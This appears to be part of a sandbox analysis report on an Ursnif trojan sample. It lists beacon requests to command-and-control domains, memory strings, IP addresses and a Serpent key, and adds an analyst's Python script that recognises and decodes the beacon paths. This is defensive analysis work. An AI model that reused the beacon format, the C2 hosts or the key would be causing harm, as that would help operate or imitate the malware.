    GET /images/D9OpVtR6ch7yaXQM/EaD5xW8ABdTYyBP/Gt4cJ_2FjFXycO4TGu/MCD9o93qF/gcXCxsJliTt7CsKUUThQ/_2BQOzGD7VTScWFbBq7/rYz6zqd1hDOgClF7ZjyuP0/PVO4xmcJgwOqT/bRFkn69p/urNzBLvaZk_2FHiycO_2Fnk/NDLAeqS6wj/HuFpoxGxaXolfyDuy/j3x_2FwiqF8u/_2BNOdDri_2/BxGc1t_2BdTChs/9z_2Fo9enBDmQdKXyPaDP/tbX9QQQWLbdOHznP/nJCwvBsm_2F/C.jpeg HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)
    Connection: Keep-Alive
    Cache-Control: no-cache
    Host: www.lycos.com
Source: global traffic. HTTP traffic detected:
    GET /images/D9OpVtR6ch7yaXQM/EaD5xW8ABdTYyBP/Gt4cJ_2FjFXycO4TGu/MCD9o93qF/gcXCxsJliTt7CsKUUThQ/_2BQOzGD7VTScWFbBq7/rYz6zqd1hDOgClF7ZjyuP0/PVO4xmcJgwOqT/bRFkn69p/urNzBLvaZk_2FHiycO_2Fnk/NDLAeqS6wj/HuFpoxGxaXolfyDuy/j3x_2FwiqF8u/_2BNOdDri_2/BxGc1t_2BdTChs/9z_2Fo9enBDmQdKXyPaDP/tbX9QQQWLbdOHznP/nJCwvBsm_2F/C.jpeg/ HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)
    Connection: Keep-Alive
    Cache-Control: no-cache
    Host: www.lycos.com
Source: global traffic. HTTP traffic detected:
    GET /images/ULsdPIVaor8tHILk/0ulmqbrH6ITnKv9/hjuxJRtL9AnqjM_2F9/31KQzlJ4A/RADn_2B9K7qN4OIWzhqt/e9pg3qo9NJvDplsJyu_/2BINJhitzziIxZ5FGe3dQs/qXLEJMLfrql94/pbynvtsD/hbcZQz4rDORcqa20GNWm_2B/AEaRjxdvZi/WJoDjLGRG7wMNfA10/47LdHNX1Ihp_/2F5oAPCKnfW/OXUd0uJQ9lRCE3/_2Bk_2BnDXgKUHje_2FRL/1haIbjYdfbhVAxGo/8KwtG_2Fq/c.gif HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)
    Host: mail.yahoo.com
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: global traffic. HTTP traffic detected:
    GET /?.src=ym&pspid=159600001&activity=mail-direct&.lang=en-US&.intl=us&.done=https%3A%2F%2Fmail.yahoo.com%2Fd%2Fimages%2FULsdPIVaor8tHILk%2F0ulmqbrH6ITnKv9%2FhjuxJRtL9AnqjM_2F9%2F31KQzlJ4A%2FRADn_2B9K7qN4OIWzhqt%2Fe9pg3qo9NJvDplsJyu_%2F2BINJhitzziIxZ5FGe3dQs%2FqXLEJMLfrql94%2FpbynvtsD%2FhbcZQz4rDORcqa20GNWm_2B%2FAEaRjxdvZi%2FWJoDjLGRG7wMNfA10%2F47LdHNX1Ihp_%2F2F5oAPCKnfW%2FOXUd0uJQ9lRCE3%2F_2Bk_2BnDXgKUHje_2FRL%2F1haIbjYdfbhVAxGo%2F8KwtG_2Fq%2Fc.gif HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)
    Connection: Keep-Alive
    Cache-Control: no-cache
    Host: login.yahoo.com
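The Malware Configuration block and the HTTP requests above belong together: the bot beacons to the hosts in c2_domain (yahoo.com first, which is why the sandbox saw the same request shape against a legitimate site) and, via the injected explorer.exe, to lycos.com and mail.yahoo.com, with the beacon carried in a long path under a per-build directory ("jdraw", "images") with a fake file extension. The block below is an added example, not part of the Joe Sandbox report and not Ursnif's own code: it normalises the c2_domain list, recognises the request shape and recovers the still-encrypted beacon bytes. Its assumptions are mine and not stated on the page: that the token is base64 broken up with "/" at arbitrary positions, with "+", "/" and similar characters written as "_" plus two hex digits ("_2B", "_2F"), and that a genuine beacon decodes to a multiple of the 16-byte Serpent block (the last request, a real Yahoo login redirect, is the negative case). BEACON_PATH and MIN_TOKEN are my names; decrypting with serpent_key is the next step and is not done here.

```python
"""Tie the extracted Ursnif configuration to the beacon requests in the report.

Added example, not part of the Joe Sandbox report. Reuses the c2_domain list
and serpent_key from the configuration and the GET paths from the HTTP traffic
entries. Assumptions (mine): the path token is base64 broken up with random
"/" characters, with URL-unsafe characters written as "_" + two hex digits
("_2B" for "+", "_2F" for "/"); the first directory and the extension are
per-build constants. Serpent decryption is not performed here.
"""
import base64
import binascii
import re
from urllib.parse import urlparse

CONFIG = {  # fields copied from the report's Malware Configuration block
    "c2_domain": ["yahoo.com", "soderunovos.website", "qoderunovos.website",
                  "https://soderunovos.website", "https://qoderunovos.website"],
    "serpent_key": "10291029JSJUYNHG",
}

REQUESTS = [  # (Host header, path) copied from the HTTP traffic entries
    ("yahoo.com", "/jdraw/HHAQ457B0GtLskLkv/Zizh9TthhcPc/xT0iS3Qjl7y/kpH0MqC4dszB3H/"
                  "HWmjHuRTfALKqcqKHLe5h/5KAnfOS4i_2BLVi7/2L64u5xwvTf3sXp/UrLoeHhSH12GKB9jsQ/"
                  "3izuuqgp_/2BeydbeuNgrndFBMAfCQ/MxSWsDqksAzA_2F87xp/N1In9Bv1C1YQS1KkwHJ10H/TNNv.crw"),
    ("soderunovos.website", "/jdraw/0YhG8dyRv9LD/mE_2FqtpH8f/iA2o2vkhZI6Ka5/bM6HfTgg8_2Fnm82bns_2/"
                            "FQ3LtU8rWKiGuaw8/NuVUF4C1kJEvzo9/4q_2FzKx_2BoAuXF6T/M0a9puLXo/g7QZ3Z41pnSqstIxrJFr/"
                            "XQfDXm0MsROvBP6zJyK/pIVUVQiiCBcAOAJCd7Rzb1/y_2BZhUKXYwpc/xuZh04Cte3g_2F/_2Bc.crw"),
    ("login.yahoo.com", "/?.src=ym&pspid=159600001&activity=mail-direct"),  # real redirect, not a beacon
]

# per-build directory, slash-broken token (at least two segments), fake extension, optional "/"
BEACON_PATH = re.compile(
    r"^/[A-Za-z0-9]+/(?P<tok>[A-Za-z0-9_]+(?:/[A-Za-z0-9_]+)+)\.(?P<ext>[a-z]{3,4})/?$")
MIN_TOKEN = 64   # shorter tokens cannot hold a full encrypted query (assumption)

def config_hosts(cfg):
    """Bare host names from c2_domain; some entries carry a scheme, some do not."""
    return {(urlparse(e).hostname if "://" in e else e).lower() for e in cfg["c2_domain"]}

def host_in_config(host, hosts):
    host = host.lower()
    return host in hosts or any(host.endswith("." + h) for h in hosts)

def decode_token(tok):
    """Undo the URL mangling; returns the raw (still Serpent-encrypted) bytes or None."""
    joined = tok.replace("/", "")   # strip separators first: "_2B" may be split as "_/2B"
    b64 = re.sub(r"_([0-9A-Fa-f]{2})", lambda m: chr(int(m.group(1), 16)), joined)
    b64 += "=" * (-len(b64) % 4)    # the bot drops padding; put it back
    try:
        return base64.b64decode(b64, validate=True)
    except (binascii.Error, ValueError):
        return None

def extract_beacon(path):
    """Encrypted payload if the path has the beacon shape, else None."""
    m = BEACON_PATH.match(path)
    if not m or len(m.group("tok").replace("/", "")) < MIN_TOKEN:
        return None
    return decode_token(m.group("tok"))

def triage(requests, cfg):
    """One record per request: configured C2 host? beacon-shaped? payload size."""
    hosts = config_hosts(cfg)
    out = []
    for host, path in requests:
        payload = extract_beacon(path)
        out.append({"host": host, "c2_host": host_in_config(host, hosts),
                    "beacon": payload is not None,
                    "payload_len": None if payload is None else len(payload)})
    return out

if __name__ == "__main__":
    for rec in triage(REQUESTS, CONFIG):
        print(rec)
```

Stripping the slashes before resolving the "_XX" escapes is the detail that matters: in the first request the escape "_2B" is split across a slash ("3izuuqgp_/2Beydbeu"), so a decoder that resolves escapes segment by segment produces garbage. Both beacon paths decode to 144 bytes, a multiple of the Serpent block size, which is the cheap consistency check before spending a Serpent implementation and the configured key on them.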
                      Source: Joe Sandbox ViewASN Name: M247GB M247GB
                      Source: Joe Sandbox ViewIP Address: 89.44.9.140 89.44.9.140
                      Source: Joe Sandbox ViewIP Address: 74.6.143.26 74.6.143.26
Source: FpYf5EGDO9.exe, 00000000.00000003.449933365.0000000005C38000.00000004.00000040.sdmp, powershell.exe, 0000000E.00000003.484252773.000001A99926C000.00000004.00000040.sdmp, control.exe, 00000015.00000003.463766511.00000227E5BFC000.00000004.00000040.sdmp, RuntimeBroker.exe, 0000001E.00000002.826107639.000001B91FF02000.00000004.00000001.sdmp, rundll32.exe, 0000001F.00000003.539185713.000001B88940C000.00000004.00000040.sdmp, RuntimeBroker.exe, 00000023.00000002.829961859.00000163C5A02000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000024.00000002.823251492.000001EAE4A02000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000025.00000002.820256805.0000027741E02000.00000004.00000001.sdmp, cmd.exe, 0000002C.00000003.696288190.0000000003DF8000.00000004.00000040.sdmp | String found in binary or memory: http://constitution.org/usdeclar.txt
Source: FpYf5EGDO9.exe, 00000000.00000003.449933365.0000000005C38000.00000004.00000040.sdmp, powershell.exe, 0000000E.00000003.484252773.000001A99926C000.00000004.00000040.sdmp, control.exe, 00000015.00000003.463766511.00000227E5BFC000.00000004.00000040.sdmp, RuntimeBroker.exe, 0000001E.00000002.826107639.000001B91FF02000.00000004.00000001.sdmp, rundll32.exe, 0000001F.00000003.539185713.000001B88940C000.00000004.00000040.sdmp, RuntimeBroker.exe, 00000023.00000002.829961859.00000163C5A02000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000024.00000002.823251492.000001EAE4A02000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000025.00000002.820256805.0000027741E02000.00000004.00000001.sdmp, cmd.exe, 0000002C.00000003.696288190.0000000003DF8000.00000004.00000040.sdmp | String found in binary or memory: http://constitution.org/usdeclar.txtC:
Source: FpYf5EGDO9.exe, 00000000.00000003.450513651.0000000002240000.00000004.00000001.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 0000000E.00000003.441167820.000001A9988C5000.00000004.00000001.sdmp | String found in binary or memory: http://crl.micro
Source: FpYf5EGDO9.exe, 00000000.00000003.449933365.0000000005C38000.00000004.00000040.sdmp, powershell.exe, 0000000E.00000003.484252773.000001A99926C000.00000004.00000040.sdmp, control.exe, 00000015.00000003.463766511.00000227E5BFC000.00000004.00000040.sdmp, RuntimeBroker.exe, 0000001E.00000002.826107639.000001B91FF02000.00000004.00000001.sdmp, rundll32.exe, 0000001F.00000003.539185713.000001B88940C000.00000004.00000040.sdmp, RuntimeBroker.exe, 00000023.00000002.829961859.00000163C5A02000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000024.00000002.823251492.000001EAE4A02000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000025.00000002.820256805.0000027741E02000.00000004.00000001.sdmp, cmd.exe, 0000002C.00000003.696288190.0000000003DF8000.00000004.00000040.sdmp | String found in binary or memory: http://https://file://USER.ID%lu.exe/upd
Source: RuntimeBroker.exe, 00000023.00000000.599967225.00000163C251A000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000024.00000002.818940023.000001EAE2102000.00000004.00000001.sdmp | String found in binary or memory: http://ns.adobe.cmg
Source: RuntimeBroker.exe, 00000024.00000002.818940023.000001EAE2102000.00000004.00000001.sdmp | String found in binary or memory: http://ns.adobe.co/xa
Source: RuntimeBroker.exe, 00000024.00000002.818940023.000001EAE2102000.00000004.00000001.sdmp | String found in binary or memory: http://ns.adobe.ux
Source: RuntimeBroker.exe, 00000023.00000000.599967225.00000163C251A000.00000004.00000001.sdmp | String found in binary or memory: http://ns.adobe.uxs
Source: RuntimeBroker.exe, 00000024.00000002.818940023.000001EAE2102000.00000004.00000001.sdmp | String found in binary or memory: http://ns.adobp/
Source: RuntimeBroker.exe, 00000023.00000000.599967225.00000163C251A000.00000004.00000001.sdmp | String found in binary or memory: http://ns.adobp/3
Source: RuntimeBroker.exe, 00000024.00000002.818940023.000001EAE2102000.00000004.00000001.sdmp | String found in binary or memory: http://ns.micro/1
Source: RuntimeBroker.exe, 00000023.00000000.599967225.00000163C251A000.00000004.00000001.sdmp | String found in binary or memory: http://ns.micro/1S
Source: powershell.exe, 0000000E.00000002.591569483.000001A990292000.00000004.00000001.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000000E.00000002.546951449.000001A980439000.00000004.00000001.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 0000000E.00000002.545761231.000001A980231000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000000E.00000002.546951449.000001A980439000.00000004.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 0000000E.00000002.591569483.000001A990292000.00000004.00000001.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000E.00000002.591569483.000001A990292000.00000004.00000001.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000E.00000002.591569483.000001A990292000.00000004.00000001.sdmp | String found in binary or memory: https://contoso.com/License
Source: FpYf5EGDO9.exe, 00000000.00000003.450513651.0000000002240000.00000004.00000001.sdmp | String found in binary or memory: https://csp.yahoo.com/beacon/csp?src=ats&site=frontpage&region=US&lan
Source: FpYf5EGDO9.exe, 00000000.00000003.351373141.0000000002246000.00000004.00000001.sdmp | String found in binary or memory: https://csp.yahoo.com/beacon/csp?src=ats&site=frontpage&region=US&lang=en-US&device=desktop&yrid=8vo
Source: powershell.exe, 0000000E.00000002.546951449.000001A980439000.00000004.00000001.sdmp | String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 0000000E.00000002.591569483.000001A990292000.00000004.00000001.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
Source: FpYf5EGDO9.exe, 00000000.00000003.351373141.0000000002246000.00000004.00000001.sdmp | String found in binary or memory: https://policies.yahoo.com/w3c/p3p.xml
Source: FpYf5EGDO9.exe, 00000000.00000003.351603382.00000000048F8000.00000004.00000040.sdmp | String found in binary or memory: https://qoderunovos.website
Source: FpYf5EGDO9.exe, 00000000.00000003.351603382.00000000048F8000.00000004.00000040.sdmp | String found in binary or memory: https://soderunovos.website
Source: FpYf5EGDO9.exe, 00000000.00000003.450513651.0000000002240000.00000004.00000001.sdmp | String found in binary or memory: https://soderunovos.website/
Source: FpYf5EGDO9.exe, 00000000.00000003.450513651.0000000002240000.00000004.00000001.sdmp | String found in binary or memory: https://soderunovos.website/jdraw/0YhG8dyRv9LD/mE_2FqtpH8f/iA2o2vkhZI6Ka5/bM6HfTgg8_2Fnm82bns_2/FQ3L
Source: FpYf5EGDO9.exe, 00000000.00000002.510275033.00000000021CA000.00000004.00000001.sdmp | String found in binary or memory: https://soderunovos.website/jdraw/4HxkLkhxWL_2FVANLY1/THbawZOPrnWBhU0uh241NM/FRF0QIjHzIK9t/dTYxInYO/
Source: FpYf5EGDO9.exe, 00000000.00000003.450513651.0000000002240000.00000004.00000001.sdmp | String found in binary or memory: https://soderunovos.website/jdraw/8_2FELbHd/vcKlysS2_2B8o4xm4kBA/fbRTQSqR8KhaRfcmG4D/_2BYwGT6a_2BctW
Source: FpYf5EGDO9.exe, 00000000.00000003.351603382.00000000048F8000.00000004.00000040.sdmp | String found in binary or memory: https://soderunovos.websitehttps://qoderunovos.websiteo
Source: FpYf5EGDO9.exe, 00000000.00000003.351373141.0000000002246000.00000004.00000001.sdmp | String found in binary or memory: https://www.yahoo.com/
Source: FpYf5EGDO9.exe, 00000000.00000003.351373141.0000000002246000.00000004.00000001.sdmp | String found in binary or memory: https://www.yahoo.com//
Source: FpYf5EGDO9.exe, 00000000.00000003.450513651.0000000002240000.00000004.00000001.sdmp | String found in binary or memory: https://www.yahoo.com/?err=404&err_url=https%3a%2f%2fwww.yahoo.com%2fj
Source: FpYf5EGDO9.exe, 00000000.00000003.351362297.0000000002289000.00000004.00000001.sdmp, FpYf5EGDO9.exe, 00000000.00000003.351373141.0000000002246000.00000004.00000001.sdmp | String found in binary or memory: https://www.yahoo.com/?err=404&err_url=https%3a%2f%2fwww.yahoo.com%2fjdraw%2fHHAQ457B0GtLskLkv%2fZiz
Source: FpYf5EGDO9.exe, 00000000.00000003.450513651.0000000002240000.00000004.00000001.sdmp | String found in binary or memory: https://www.yahoo.com/R
Source: FpYf5EGDO9.exe, 00000000.00000003.450513651.0000000002240000.00000004.00000001.sdmp | String found in binary or memory: https://www.yahoo.com/jdraw/HHAQ457B0GtLskLkv/Zizh9TthhcPc/xT0iS3Qjl7y/kpH0MqC4dszB3H/HWmjHuRTfALKqc
Source: FpYf5EGDO9.exe, 00000000.00000003.351373141.0000000002246000.00000004.00000001.sdmp | String found in binary or memory: https://www.yahoo.com/u
Source: FpYf5EGDO9.exe, 00000000.00000002.510275033.00000000021CA000.00000004.00000001.sdmp | String found in binary or memory: https://yahoo.com/
Source: FpYf5EGDO9.exe, 00000000.00000002.510452658.0000000002219000.00000004.00000001.sdmp | String found in binary or memory: https://yahoo.com/jdraw/HHAQ457B0GtLskLkv/Zizh9TthhcPc/xT0iS3Qjl7y/kpH0MqC4dszB3H/HWmjHuRTfALKqcqKHL
Source: unknown | DNS traffic detected: queries for: yahoo.com
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe | Code function: 0_2_03C45988 ResetEvent,ResetEvent,lstrcat,InternetReadFile,GetLastError,ResetEvent,InternetReadFile,GetLastError
Source: global traffic | HTTP traffic detected: GET /jdraw/HHAQ457B0GtLskLkv/Zizh9TthhcPc/xT0iS3Qjl7y/kpH0MqC4dszB3H/HWmjHuRTfALKqcqKHLe5h/5KAnfOS4i_2BLVi7/2L64u5xwvTf3sXp/UrLoeHhSH12GKB9jsQ/3izuuqgp_/2BeydbeuNgrndFBMAfCQ/MxSWsDqksAzA_2F87xp/N1In9Bv1C1YQS1KkwHJ10H/TNNv.crw HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: yahoo.com | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /jdraw/HHAQ457B0GtLskLkv/Zizh9TthhcPc/xT0iS3Qjl7y/kpH0MqC4dszB3H/HWmjHuRTfALKqcqKHLe5h/5KAnfOS4i_2BLVi7/2L64u5xwvTf3sXp/UrLoeHhSH12GKB9jsQ/3izuuqgp_/2BeydbeuNgrndFBMAfCQ/MxSWsDqksAzA_2F87xp/N1In9Bv1C1YQS1KkwHJ10H/TNNv.crw HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Connection: Keep-Alive | Cache-Control: no-cache | Host: www.yahoo.com | Cookie: B=emaekhlgpqi05&b=3&s=ke
Source: global traffic | HTTP traffic detected: GET /jdraw/0YhG8dyRv9LD/mE_2FqtpH8f/iA2o2vkhZI6Ka5/bM6HfTgg8_2Fnm82bns_2/FQ3LtU8rWKiGuaw8/NuVUF4C1kJEvzo9/4q_2FzKx_2BoAuXF6T/M0a9puLXo/g7QZ3Z41pnSqstIxrJFr/XQfDXm0MsROvBP6zJyK/pIVUVQiiCBcAOAJCd7Rzb1/y_2BZhUKXYwpc/xuZh04Cte3g_2F/_2Bc.crw HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: soderunovos.website | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /jdraw/8_2FELbHd/vcKlysS2_2B8o4xm4kBA/fbRTQSqR8KhaRfcmG4D/_2BYwGT6a_2BctWO8vLxko/alAFtnlNlG6Q7/I30RLNMi/fUrGHRWZ_2Br2a8odLCOSy2/Pp0uf39xNF/zw_2Bgb01eHiph9fS/HUtF_2BI_2FW/KJsziSAbwfK/PI_2FrcgGvn_2F/if7htk49j1cWEP5dTbASH/YfWHdUallNi/oU.crw HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: soderunovos.website | Connection: Keep-Alive | Cache-Control: no-cache | Cookie: PHPSESSID=hvn8dm2743er2gc0b5q06914n7; lang=en
Source: global traffic | HTTP traffic detected: GET /jdraw/4HxkLkhxWL_2FVANLY1/THbawZOPrnWBhU0uh241NM/FRF0QIjHzIK9t/dTYxInYO/rat2KiIdmFuMYJV01lFIUuv/pv1M_2F42q/2ghlrrK6HyvaK1iGn/6FWd3U6RwdJs/DwljQfV1T1s/A2jFEhH_2FVbra/gemmgKqmTU3dGSSrHsVgF/6KFwQzXOgNC787ml/o9EUNqnCP/_2FVV.crw HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: soderunovos.website | Connection: Keep-Alive | Cache-Control: no-cache | Cookie: PHPSESSID=hvn8dm2743er2gc0b5q06914n7; lang=en
Source: global traffic | HTTP traffic detected: GET /images/D9OpVtR6ch7yaXQM/EaD5xW8ABdTYyBP/Gt4cJ_2FjFXycO4TGu/MCD9o93qF/gcXCxsJliTt7CsKUUThQ/_2BQOzGD7VTScWFbBq7/rYz6zqd1hDOgClF7ZjyuP0/PVO4xmcJgwOqT/bRFkn69p/urNzBLvaZk_2FHiycO_2Fnk/NDLAeqS6wj/HuFpoxGxaXolfyDuy/j3x_2FwiqF8u/_2BNOdDri_2/BxGc1t_2BdTChs/9z_2Fo9enBDmQdKXyPaDP/tbX9QQQWLbdOHznP/nJCwvBsm_2F/C.jpeg HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64) | Host: lycos.com | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /images/D9OpVtR6ch7yaXQM/EaD5xW8ABdTYyBP/Gt4cJ_2FjFXycO4TGu/MCD9o93qF/gcXCxsJliTt7CsKUUThQ/_2BQOzGD7VTScWFbBq7/rYz6zqd1hDOgClF7ZjyuP0/PVO4xmcJgwOqT/bRFkn69p/urNzBLvaZk_2FHiycO_2Fnk/NDLAeqS6wj/HuFpoxGxaXolfyDuy/j3x_2FwiqF8u/_2BNOdDri_2/BxGc1t_2BdTChs/9z_2Fo9enBDmQdKXyPaDP/tbX9QQQWLbdOHznP/nJCwvBsm_2F/C.jpeg HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64) | Connection: Keep-Alive | Cache-Control: no-cache | Host: www.lycos.com
Source: global traffic | HTTP traffic detected: GET /images/D9OpVtR6ch7yaXQM/EaD5xW8ABdTYyBP/Gt4cJ_2FjFXycO4TGu/MCD9o93qF/gcXCxsJliTt7CsKUUThQ/_2BQOzGD7VTScWFbBq7/rYz6zqd1hDOgClF7ZjyuP0/PVO4xmcJgwOqT/bRFkn69p/urNzBLvaZk_2FHiycO_2Fnk/NDLAeqS6wj/HuFpoxGxaXolfyDuy/j3x_2FwiqF8u/_2BNOdDri_2/BxGc1t_2BdTChs/9z_2Fo9enBDmQdKXyPaDP/tbX9QQQWLbdOHznP/nJCwvBsm_2F/C.jpeg/ HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64) | Connection: Keep-Alive | Cache-Control: no-cache | Host: www.lycos.com
Source: global traffic | HTTP traffic detected: GET /images/ULsdPIVaor8tHILk/0ulmqbrH6ITnKv9/hjuxJRtL9AnqjM_2F9/31KQzlJ4A/RADn_2B9K7qN4OIWzhqt/e9pg3qo9NJvDplsJyu_/2BINJhitzziIxZ5FGe3dQs/qXLEJMLfrql94/pbynvtsD/hbcZQz4rDORcqa20GNWm_2B/AEaRjxdvZi/WJoDjLGRG7wMNfA10/47LdHNX1Ihp_/2F5oAPCKnfW/OXUd0uJQ9lRCE3/_2Bk_2BnDXgKUHje_2FRL/1haIbjYdfbhVAxGo/8KwtG_2Fq/c.gif HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64) | Host: mail.yahoo.com | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /?.src=ym&pspid=159600001&activity=mail-direct&.lang=en-US&.intl=us&.done=https%3A%2F%2Fmail.yahoo.com%2Fd%2Fimages%2FULsdPIVaor8tHILk%2F0ulmqbrH6ITnKv9%2FhjuxJRtL9AnqjM_2F9%2F31KQzlJ4A%2FRADn_2B9K7qN4OIWzhqt%2Fe9pg3qo9NJvDplsJyu_%2F2BINJhitzziIxZ5FGe3dQs%2FqXLEJMLfrql94%2FpbynvtsD%2FhbcZQz4rDORcqa20GNWm_2B%2FAEaRjxdvZi%2FWJoDjLGRG7wMNfA10%2F47LdHNX1Ihp_%2F2F5oAPCKnfW%2FOXUd0uJQ9lRCE3%2F_2Bk_2BnDXgKUHje_2FRL%2F1haIbjYdfbhVAxGo%2F8KwtG_2Fq%2Fc.gif HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64) | Connection: Keep-Alive | Cache-Control: no-cache | Host: login.yahoo.com
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49821
Source: unknown | Network traffic detected: HTTP traffic on port 49817 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49820
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown | Network traffic detected: HTTP traffic on port 49819 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49820 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49818 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49821 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49819
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49818
Source: unknown | Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49817
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown | Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49755 -> 443
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | date: Tue, 23 Nov 2021 19:59:01 GMT | p3p: policyref="https://policies.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV" | cache-control: private | x-content-type-options: nosniff | content-type: text/html; charset=UTF-8 | x-envoy-upstream-service-time: 14 | server: ATS | Content-Length: 1052 | Age: 1 | Connection: close | Strict-Transport-Security: max-age=31536000 | Content-Security-Policy: frame-ancestors 'self' https://*.builtbygirls.com https://*.rivals.com https://*.engadget.com https://*.intheknow.com https://*.autoblog.com https://*.techcrunch.com https://*.yahoo.com https://*.aol.com https://*.huffingtonpost.com https://*.oath.com https://*.search.yahoo.com https://*.search.aol.com https://*.search.huffpost.com https://*.verizonmedia.com https://*.publishing.oath.com https://*.autoblog.com; sandbox allow-forms allow-same-origin allow-scripts allow-popups allow-popups-to-escape-sandbox allow-presentation; report-uri https://csp.yahoo.com/beacon/csp?src=ats&site=frontpage&region=US&lang=en-US&device=desktop&yrid=8voena9gpqi06&partner=; | X-Frame-Options: SAMEORIGIN | X-XSS-Protection: 1; mode=block
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Tue, 23 Nov 2021 20:01:39 GMT | Server: Apache | Content-Security-Policy: frame-ancestors 'self' *.lycos.com | X-Powered-By: PHP/7.2.24 | Connection: close | Transfer-Encoding: chunked | Content-Type: text/html; charset=UTF-8
Source: FpYf5EGDO9.exe, 00000000.00000003.351373141.0000000002246000.00000004.00000001.sdmp | String found in binary or memory: *.www.yahoo.com equals www.yahoo.com (Yahoo)
Source: FpYf5EGDO9.exe, 00000000.00000003.351373141.0000000002246000.00000004.00000001.sdmp | String found in binary or memory: *.www.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: FpYf5EGDO9.exe, 00000000.00000003.351373141.0000000002246000.00000004.00000001.sdmp | String found in binary or memory: *.www.yahoo.comT equals www.yahoo.com (Yahoo)
Source: FpYf5EGDO9.exe, 00000000.00000003.450513651.0000000002240000.00000004.00000001.sdmp | String found in binary or memory: +www.yahoo.co equals www.yahoo.com (Yahoo)
Source: FpYf5EGDO9.exe, 00000000.00000003.351373141.0000000002246000.00000004.00000001.sdmp | String found in binary or memory: +www.yahoo.com equals www.yahoo.com (Yahoo)
Source: FpYf5EGDO9.exe, 00000000.00000003.351362297.0000000002289000.00000004.00000001.sdmp | String found in binary or memory: <noscript><META http-equiv="refresh" content="0;URL='https://www.yahoo.com/?err=404&err_url=https%3a%2f%2fwww.yahoo.com%2fjdraw%2fHHAQ457B0GtLskLkv%2fZizh9TthhcPc%2fxT0iS3Qjl7y%2fkpH0MqC4dszB3H%2fHWmjHuRTfALKqcqKHLe5h%2f5KAnfOS4i_2BLVi7%2f2L64u5xwvTf3sXp%2fUrLoeHhSH12GKB9jsQ%2f3izuuqgp_%2f2BeydbeuNgrndFBMAfCQ%2fMxSWsDqksAzA_2F87xp%2fN1In9Bv1C1YQS1KkwHJ10H%2fTNNv.crw'"></noscript> equals www.yahoo.com (Yahoo)
